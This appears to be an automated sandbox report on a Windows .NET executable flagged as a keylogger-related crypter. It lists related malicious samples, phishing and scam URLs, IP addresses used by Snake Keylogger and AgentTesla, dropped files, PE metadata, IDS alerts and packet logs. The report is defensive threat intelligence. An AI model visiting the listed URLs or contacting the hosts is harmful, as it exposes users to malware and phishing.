	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
checkip.dyndns.com	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://mintlink32.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	https://bostempek.vercel.app/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegram-privatefree.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tes.lavender8639.workers.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://live-prons-sex.pages.dev/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
CLOUDFLARENETUS	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Contract_Agreement_Wednesday September 2024.pdf	Get hash	malicious	Unknown	Browse	162.159.61.3
	http://linksapp.top:443	Get hash	malicious	Unknown	Browse	104.21.74.63
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	p37SE6gM52.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	104.21.17.90
	gvyO903Xmm.exe	Get hash	malicious	FormBook	Browse	104.21.70.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.58.182
	iq2HxA0SLw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
UTMEMUS	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	CMR_7649.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ____RM quotation_JPEG IMAGE.img.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	450230549.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	450230549.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://tiktok1688.cc/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://qwekorqw-eqo.top/	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	15DF1506860EF01EE206E90F990D0793
SHA1:	87B49532502A829CEB4C2860F263BFD399FF0C3A
SHA-256:	E784E1D05093C8B83297C7F77A0D25A21A8FB767801FDEAAA42CCC3166800465
SHA-512:	EF88064F4612332CC8405FB0405CD2B70A6DD9D93366651E405421EE9A0BB8B5409652B407D64A3343D142F9D62B6035608F93855C133D489FFA102A844C75CF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tzoqm1k.hk2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21lqgs3s.2lh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpzdcvwv.4oj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duoksdqd.zn1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.875943883609069
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
File size:	704'000 bytes
MD5:	42f2ce52a57e0d72eac297a532354e42
SHA1:	7f2f1ef38365147865f1cec2c1d0ad62cdc6f7d0
SHA256:	516ffdb4ef149292e235bea6b676674d973e52c3382fdd3c40f85245f9e564ba
SHA512:	6bd38183780b7dc761cfeaafb3742f17a1ceade827fc0d815cff8969f0fd530e4ace5fb70754e056fed44939ef774a4f5ef4b6a7fe9ec2f4c43bb3c49d4bfeee
SSDEEP:	12288:nqR++ZR3W83B1LViDaDHkzrmvK0eVMfNHczr9wdG7gZf0mMlJEdtTJJ:nE++Zc8NilrAKHV+NHcH9F7jmMb4
TLSH:	71E412851127CA13C0932FF41BA1E2B527B91ED9AA02D7539FE63DFBB5B97001A00367
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......$......v.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	1e77fe7273f0311e

Static PE Info

General

Entrypoint:	0x4ab676
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F4D4A1 [Thu Sep 26 03:27:29 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xab624	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x20ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa967c	0xa9800	64dca5b2279149cf5437317220d5c1d7	False	0.9212268390486725	data	7.882388794743662	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x20ac	0x2200	b7ca4fd6485a38e604df7120448f1c31	False	0.8968290441176471	data	7.497691011869445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	46711b7f7f435f8eb8fe91afbb336139	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xac0c8	0x1cbb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.996057104010877
RT_GROUP_ICON	0xadd94	0x14	data	1.05
RT_VERSION	0xaddb8	0x2f0	SysEx File - IDP	0.4454787234042553

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T10:33:10.667560+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49744	132.226.8.169	80	TCP
2024-09-26T10:33:12.042568+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49744	132.226.8.169	80	TCP
2024-09-26T10:33:12.614165+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49747	188.114.97.3	443	TCP
2024-09-26T10:33:14.421416+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49749	132.226.8.169	80	TCP
2024-09-26T10:33:23.063659+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49761	188.114.97.3	443	TCP
2024-09-26T10:33:24.575891+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49763	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 10:33:09.327764034 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:09.332628965 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:09.332695007 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:09.332925081 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:09.337768078 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:10.291220903 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:10.295605898 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:10.300478935 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:10.623090029 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:10.667560101 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:10.983280897 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:10.983339071 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:10.983427048 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:10.993781090 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:10.993799925 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.465466976 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.465547085 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.469907045 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.469918013 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.470346928 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.511331081 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.534074068 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.579406977 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.640515089 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.640631914 CEST	443	49745	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.640683889 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.646155119 CEST	49745	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.650115967 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:11.655040026 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:11.996979952 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:11.999828100 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:11.999859095 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:11.999916077 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:12.000531912 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:12.000545025 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:12.042567968 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.484469891 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:12.486315966 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:12.486339092 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:12.614182949 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:12.614324093 CEST	443	49747	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:12.614394903 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:12.619899988 CEST	49747	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:12.624202967 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.625380993 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.629590034 CEST	80	49744	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:12.629647970 CEST	49744	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.630189896 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:12.630271912 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.630379915 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:12.636336088 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.421216965 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.421416044 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:14.421868086 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.421916962 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:14.422338963 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.422380924 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:14.422883034 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:14.422910929 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:14.423044920 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:14.423357010 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:14.423372030 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:14.423542976 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.423589945 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:14.428411961 CEST	80	49749	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:14.428476095 CEST	49749	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:14.882021904 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:14.884354115 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:14.884372950 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:15.035223007 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:15.035321951 CEST	443	49750	188.114.97.3	192.168.2.4
Sep 26, 2024 10:33:15.035408974 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:15.035984993 CEST	49750	443	192.168.2.4	188.114.97.3
Sep 26, 2024 10:33:15.040610075 CEST	49751	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:15.045536041 CEST	80	49751	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:15.045614958 CEST	49751	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:15.045784950 CEST	49751	80	192.168.2.4	132.226.8.169
Sep 26, 2024 10:33:15.050977945 CEST	80	49751	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:16.344799042 CEST	80	49751	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:16.344932079 CEST	80	49751	132.226.8.169	192.168.2.4
Sep 26, 2024 10:33:16.345089912 CEST	49751	80	192.168.2.4	132.226.8.169
